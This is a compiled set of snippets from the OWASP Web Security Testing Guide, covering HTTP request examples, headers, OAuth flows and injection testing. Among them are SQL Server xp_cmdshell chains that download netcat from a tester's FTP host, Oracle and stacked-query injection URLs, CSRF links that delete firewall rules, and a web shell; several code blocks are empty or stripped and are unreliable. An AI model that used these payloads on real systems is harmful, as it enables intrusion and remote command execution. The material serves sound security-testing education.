### Identify Application Entry Points: GET Request Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.md
This example demonstrates a GET request to purchase an item, illustrating parameters like CUSTOMERID, ITEM, PRICE, IP, and Cookie which can serve as entry points.
```http
GET /shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x HTTP/1.1
Host: x.x.x.x
Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy
```
--------------------------------
### Example GET Request for User Registration
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md
Illustrates how user registration data might be sent via a GET request, which the application then processes.
```http
https://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com
```
--------------------------------
### Example HTTP Request and Response
Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md
An example illustrating a GET request for a home page and its corresponding server response, demonstrating truncation for clarity.
```APIDOC
## Example HTTP Request and Response
If the tester sends the following HTTP Request for the home page:
```http
GET / HTTP/1.1
Host: localhost:8080
```
Check if the response shows information about the server:
```http
HTTP/1.1 200
[...]
Apache Tomcat/10.0.4
[...]
```
In this result, the response identifies the server as Tomcat 10.0.4.
```
--------------------------------
### Example HTTP Request
Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md
An example of a minimal HTTP GET request for a web server's root directory. This snippet illustrates the essential components required for a basic request, omitting unnecessary headers for brevity.
```http
GET / HTTP/1.1
Host: localhost:8080
```
--------------------------------
### Example HTTP GET Request for Profile Data
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md
Illustrates an HTTP GET request to retrieve profile data. This is a standard request that might be made by a web application.
```http
GET /profile.php HTTP/1.1
Host: example.foo
[...]
Referer: https://example.foo/main.php
Connection: keep-alive
```
--------------------------------
### Identify Application Entry Points: POST Request Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/06-Identify_Application_Entry_Points.md
This example shows a POST request for application authentication, highlighting parameters in the query string, Cookie header, and request body as potential entry points.
```http
POST /example/authenticate.asp?service=login HTTP/1.1
Host: x.x.x.x
Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA==;CustomCookie=00my00trusted00ip00is00x.x.x.x00
user=admin&pass=pass123&debug=true&fromtrustIP=true
```
--------------------------------
### Example Explanation
Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md
Explanation of the elements and techniques used in the example HTTP request and response snippet.
```APIDOC
## Example Explanation
- The HTTP request and response have text describing them to the reader before the request and response.
- The GET request has the smallest amount of headers to have the desired response from the server.
- For example, there is no `User-Agent:` as it is not needed for the "test case".
- The article uses brackets and ellipsis `[...]` to cut out unnecessary parts of the response.
- Unnecessary response content for this sample includes the `Content-Type:` header and the rest of the HTML in the body.
```
--------------------------------
### Secure Security Headers Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/14-Test_Other_HTTP_Security_Header_Misconfigurations.md
This example shows a more secure configuration for common security headers, using specific origins and stricter policies.
```http
Access-Control-Allow-Origin: {theallowedoriginurl}
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
```
--------------------------------
### GET /authorize - Authorization Code Flow with PKCE
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md
Shows an example authorization request for the Authorization Code flow, including parameters specific to the PKCE extension.
```APIDOC
## GET /authorize - Authorization Code Flow with PKCE
### Description
This endpoint initiates the Authorization Code flow, which is a secure way to obtain access tokens. This example includes parameters for the Proof Key for Code Exchange (PKCE) extension, enhancing security for public clients.
### Method
GET
### Endpoint
/authorize
### Query Parameters
- **redirect_uri** (string) - Required - The redirect URI registered with the authorization server.
- **client_id** (string) - Required - The client identifier.
- **scope** (string) - Optional - The scope of the requested access.
- **response_type** (string) - Required - Must be `code` for Authorization Code flow.
- **response_mode** (string) - Optional - Specifies how the authorization response is returned (e.g., `query`).
- **state** (string) - Required - An opaque value used to maintain state between the request and callback.
- **nonce** (string) - Optional - A value used to associate a client session with an ID Token, and to mitigate replay attacks.
- **code_challenge** (string) - Required for PKCE - The challenge generated from the code verifier.
- **code_challenge_method** (string) - Required for PKCE - The method used to generate the code challenge (e.g., `S256`).
### Request Example
```http
GET /authorize
?redirect_uri=https%3A%2F%2Fclient.example.com%2F
&client_id=some_client_id
&scope=openid%20profile%20email
&response_type=code
&response_mode=query
&state=random_state
&nonce=random_nonce
&code_challenge=random_code_challenge
&code_challenge_method=S256 HTTP/1.1
Host: as.example.com
```
```
--------------------------------
### PHP Web Shell Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files.md
A simple PHP web shell that executes operating system commands passed via a GET parameter, with IP restriction. Remember to set your IP address and remove the shell after testing.
```php
";
system($cmd);
echo "";
}
}
?>
```
--------------------------------
### Testing Non-Standard HTTP Port with Telnet
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md
This example demonstrates using telnet to connect to a specific IP address and port (8000 in this case) and sending an HTTP GET request to confirm if an HTTP server is running on that port.
```bash
telnet 192.168.10.100 8000
GET / HTTP/1.0
```
--------------------------------
### Example HTTP GET Request from Attacker Server
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md
Demonstrates an HTTP GET request made by an attacker's server to serve malicious content. The `Origin` header indicates the source of the request.
```http
GET /file.php HTTP/1.1
Host: attacker.bar
[...]
Referer: https://example.foo/main.php
origin: https://example.foo
```
--------------------------------
### robots.txt Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md
This snippet shows a sample beginning of a robots.txt file, illustrating User-agent, Disallow, and Allow directives.
```text
User-agent: *
Disallow: /search
Allow: /search/about
Allow: /search/static
Allow: /search/howsearchworks
Disallow: /sdch
...
```
--------------------------------
### Windows NT Device Namespace CD-ROM Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Shows a specific example of referencing the Windows NT device namespace to access a CD-ROM drive.
```text
\\.\CdRom0\
```
--------------------------------
### Valid __Host- Cookie Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.md
This example demonstrates a correctly configured __Host- prefixed cookie. It includes the Secure attribute, specifies the root path, and crucially, omits the Domain attribute.
```http
Set-Cookie: __Host-SID=12345; Secure; Path=/
```
--------------------------------
### Example XML Database Structure
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md
This is an example of an XML file used to store user data, illustrating the structure that might be targeted by XML injection attacks.
```xml
gandalf!c30gandalf@middleearth.comStefan0w1s3c500Stefan0@whysec.hmm
```
--------------------------------
### String Concatenation Examples
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
Demonstrates different string concatenation techniques used in various SQL dialects for testing purposes.
```SQL
‘test’ + ‘ing’
```
```SQL
‘test’ ‘ing’
```
```SQL
‘test’||’ing’
```
--------------------------------
### Secure Cookie Prefix Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.md
This example shows a cookie using the __Secure- prefix. It adheres to the requirements of having the Secure attribute set and being set from a secure URI.
```http
Set-Cookie: __Secure-Session=12345; Secure
```
--------------------------------
### PHP Code Example with String Replacement
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Illustrates a common but flawed approach in PHP where user input is processed by replacing characters before being used as a filename. This example is prone to bypasses.
```php
filename = Request.QueryString("file");
Replace(filename, "/","\");
Replace(filename, "..\","");
```
--------------------------------
### HTTP Parameter Pollution Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md
This example demonstrates how HTTP Parameter Pollution can be exploited to manipulate basket quantities by sending duplicate parameters in a POST request.
```http
POST /api/basket/add
Host: example.org
item_id=1&quantity=5&quantity=4
```
--------------------------------
### JSON API Response Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md
This JSON example shows a typical API response containing user profile details. Analyze such responses for potentially sensitive fields like 'isAdmin' that could be exploited through mass assignment.
```json
{"_id":12345,"username":"bob","age":38,"email":"bob@domain.test","isAdmin":false}
```
--------------------------------
### Example HTTP Response
Source: https://github.com/owasp/wstg/blob/master/template/999-Foo_Testing/3-Format_for_HTTP_Request_Response.md
A sample HTTP response indicating a successful request (200 OK) and revealing server information. The example uses brackets and ellipsis to denote truncated content, focusing on the relevant parts like the server identification.
```http
HTTP/1.1 200
[...]
Apache Tomcat/10.0.4
[...]
```
--------------------------------
### CONNECT Method Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md
Demonstrates a CONNECT request to establish a TCP connection to another system. This can be used for proxying traffic.
```http
CONNECT 192.168.0.1:443 HTTP/1.1
Host: example.org
```
--------------------------------
### Executing Arbitrary SQL with EXECUTE IMMEDIATE
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md
This URL shows how to use 'EXECUTE IMMEDIATE :1' to run arbitrary SQL statements, including DML and DDL.
```url
https://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual
```
--------------------------------
### Example Telnet Output for HTTP Server
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md
This is an example of the output received when an HTTP server responds to a GET request on a non-standard port, confirming the service type and version.
```text
HTTP/1.0 200 OK
pragma: no-cache
Content-Type: text/html
Server: MX4J-HTTPD/1.0
expires: now
Cache-Control: no-cache
...
```
--------------------------------
### Windows UNC Filepath Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Demonstrates the format for Windows Universal Naming Convention (UNC) filepaths, used to reference files on SMB shares.
```text
\\server_or_ip\path\to\file.abc
```
--------------------------------
### GET Request for Deleting All Firewall Rules
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md
This example demonstrates a dangerous GET request that deletes all firewall rules. If a user is logged into the management console, an attacker could exploit this by embedding this URL in a way that the user's browser automatically requests it.
```url
https://[target]/fwmgt/delete?rule=*
```
--------------------------------
### Windows NT Device Namespace Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Illustrates how to reference the Windows device namespace, which can allow access to file systems using alternative paths.
```text
\\.\GLOBALROOT\Device\HarddiskVolume1\
```
--------------------------------
### GET Request for Deleting Firewall Rule
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.md
This example shows a simple GET request URL that could be used to delete a specific firewall rule. An attacker could craft a link or embed this URL in an image tag to trick a logged-in user into executing this command.
```url
https://[target]/fwmgt/delete?rule=1
```
--------------------------------
### Project Folder Structure Example
Source: https://github.com/owasp/wstg/blob/master/style_guide.md
Illustrates the recommended directory structure for organizing articles and images within the WSTG project. Place images in an 'images/' folder within the article's directory.
```sh
document/
├───0_Foreword/
│ └───0_Foreword.md
├───1_Frontispiece/
│ ├───images/
│ │ └───example.jpg
│ └───1_Frontispiece.md
├───2_Introduction/
│ ├───images/
│ │ └───example.jpg
│ └───2_Introduction.md
├───3_The_OWASP_Testing_Framework/
│ ├───images/
│ │ └───example.jpg
│ └───3_The_OWASP_Testing_Framework.md
├───4_Web_Application_Security_Testing/
│ ├───4.1_Introduction_and_Objectives/
│ │ └───4.1_Testing_Introduction_and_Objectives.md
│ ├───4.2_Information_Gathering/
│ │ ├───images/
│ │ │ └───example.jpg
│ │ ├───4.2_Testing_Information_Gathering.md
│ │ └───4.2.1_Conduct_Search_Engine_Discovery.md
```
--------------------------------
### Upload Executable via FTP using xp_cmdshell
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
This snippet demonstrates how to upload an executable (e.g., netcat.exe) to a target SQL Server using FTP and the xp_cmdshell command. Ensure the target server can initiate FTP connections to the tester's machine.
```sql
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
```
```sql
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
```
--------------------------------
### POST Request Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables.md
This snippet shows a typical POST request containing session information. Ensure server-side code does not accept this data if sent via GET.
```http
POST /login.asp HTTP/1.1
Host: owaspapp.com
...
Cookie: ASPSESSIONIDABCDEFG=ASKLJDLKJRELKHJG
Content-Length: 51
Login=Username&password=Password&SessionID=12345678
```
--------------------------------
### Identify Implicit Flow via Response Type in Authorization Request
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/05-Testing_for_OAuth_Weaknesses.md
This example shows how to detect the Implicit Flow by checking the 'response_type' parameter in a GET request to the /authorize endpoint. The token is directly returned in the response.
```http
GET /authorize
?client_id=
&response_type=token
&redirect_uri=https%3A%2F%2Fclient.example.com%2F
&scope=openid%20profile%20email
&state=
```
--------------------------------
### Flask/Jinja2 SSTI Vulnerability in Python
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md
This Python example using Flask and Jinja2 shows how directly rendering user input (`name`) from a GET request within a Jinja2 template string can lead to SSTI and XSS vulnerabilities.
```python
@app.route("/page")
def page():
name = request.values.get('name')
output = Jinja2.from_string('Hello ' + name + '!').render()
return output
```
--------------------------------
### Upload Executable via Debugger Script using xp_cmdshell
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
This snippet shows how to upload an executable by converting it into a debug script, uploading the script line by line, and then executing it with debug.exe. This is a workaround when FTP is blocked by the firewall.
```sql
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
```
```sql
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
```
```sql
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
```
--------------------------------
### Injecting HTP.PRINT for Output
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md
This URL shows how to use HTP.PRINT to output data and add a required bind variable, enabling basic command execution.
```url
https://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR
```
--------------------------------
### Malicious CORS Payload Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md
An example of a malicious server-side response that enables CORS for a target domain and executes an XSS payload.
```php
```
--------------------------------
### Stacked Query Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
Demonstrates how to execute multiple SQL queries in a single call by appending a new query to the original. This can be used to perform actions like inserting data into other tables.
```SQL
SELECT * FROM products WHERE id_product=$id_product
```
```URL
https://www.example.com/product.php?id=10; INSERT INTO users (…)
```
--------------------------------
### Inspect Multiple Framework Indicators in HTTP Headers
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.md
This example shows how to analyze HTTP response headers, including 'X-Powered-By' and 'X-Generator', to identify the underlying web framework. It highlights that multiple headers might be needed for accurate fingerprinting, as 'X-Powered-By' can be misleading.
```http
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 07 Sep 2013 09:22:52 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.16-1~dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Generator: Swiftlet
```
--------------------------------
### Overly Permissive Security Headers Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/14-Test_Other_HTTP_Security_Header_Misconfigurations.md
This example demonstrates a configuration of security headers that might be too permissive, potentially exposing the application to risks.
```http
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
X-Permitted-Cross-Domain-Policies: all
Referrer-Policy: unsafe-url
```
--------------------------------
### Searching Certificate Transparency Logs via crt.sh
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md
This URL is an example of how to query the crt.sh Certificate Transparency log search portal. It searches for all certificates issued for subdomains of 'example.com' using a wildcard pattern.
```http
https://crt.sh/?q=%25.example.com
```
--------------------------------
### Test BFLA: GET Request for Admin Data
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/12-API_Testing/04-API_Broken_Function_Level_Authorization.md
Attempt to retrieve information that should only be accessible to high-privilege users, such as administrators, using a GET request.
```http
GET /api/admin/getAllUsers
```
--------------------------------
### Download and Display security.txt
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/03-Review_Webserver_Metafiles_for_Information_Leakage.md
This snippet demonstrates how to download the security.txt file from a web server using wget and then display its content. It's useful for quickly inspecting the security policy and contact information published by a website.
```bash
$ wget --no-verbose https://www.linkedin.com/.well-known/security.txt && cat security.txt
2020-05-07 12:56:51 URL:https://www.linkedin.com/.well-known/security.txt [333/333] -> "security.txt" [1]
# Conforms to IETF `draft-foudil-securitytxt-07`
Contact: mailto:security@linkedin.com
Contact: https://www.linkedin.com/help/linkedin/answer/62924
Encryption: https://www.linkedin.com/help/linkedin/answer/79676
Canonical: https://www.linkedin.com/.well-known/security.txt
Policy: https://www.linkedin.com/help/linkedin/answer/62924
```
--------------------------------
### Basic DOM-based XSS Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md
A simple example where a message parameter from the URL is reflected directly into the document, potentially leading to XSS if not properly sanitized.
```html
```
--------------------------------
### Discover Supported HTTP Methods with OPTIONS
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md
Use an OPTIONS request to identify the HTTP methods supported by a web server. The server's response should list the allowed methods.
```http
OPTIONS / HTTP/1.1
Host: example.org
```
```http
HTTP/1.1 200 OK
Allow: OPTIONS, GET, HEAD, POST
```
--------------------------------
### wfuzz Example Output
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md
Sample output from wfuzz demonstrating responses to injected payloads. Status codes like 500 indicate potential vulnerabilities, while 200 may indicate successful sanitization or no impact.
```text
ID Response Lines Word Chars Payload
===================================================================
000000002: 500 0 L 5 W 142 Ch "%25s%25s%25s%25n"
000000003: 500 0 L 5 W 137 Ch "%25p%25p%25p%25p%25p"
000000004: 200 0 L 1 W 48 Ch "%7Bevent.__init__.__globals__%5BCONFIG%5D%5BSECRET_KEY%5D%7D"
000000001: 200 0 L 1 W 5 Ch "alice"
```
--------------------------------
### SQL Injection via GET Request Payload
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
A payload designed for SQL injection in a GET request, aiming to extract source code by executing master.dbo.xp_cmdshell.
```sql
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
```
--------------------------------
### HTML Input Field Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md
This HTML snippet demonstrates the bracket syntax for input parameter names, which can be an indicator of potential mass assignment vulnerabilities. When encountered, try adding non-existing attributes to test for improper handling.
```html
```
--------------------------------
### Amazon S3 Path-Style URL Example
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/11-Test_Cloud_Storage.md
Example of a path-style URL for accessing an object in an Amazon S3 bucket, including region, bucket name, and key name.
```text
https://s3.us-west-2.amazonaws.com/my-bucket/puppy.png
```
--------------------------------
### Boolean Exploitation Example Request
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
An example of a URL request that could trigger a syntactic error due to SQL injection, used in boolean-based exploitation techniques to infer database information.
```http
https://www.example.com/index.php?id=1'
```
--------------------------------
### Attempt DNS Zone Transfer using 'host' command
Source: https://github.com/owasp/wstg/blob/master/document/4-Web_Application_Security_Testing/01-Information_Gathering/04-Attack_Surface_Identification.md
This example shows an attempt to perform a DNS zone transfer from a specified name server for a given domain using the 'host' command. It illustrates a common scenario where zone transfers are often refused.
```bash
$ host -l www.owasp.org ns1.secure.net
Using domain server:
Name: ns1.secure.net
Address: 192.220.124.10#53
Aliases:
Host www.owasp.org not found: 5(REFUSED)
; Transfer failed.
```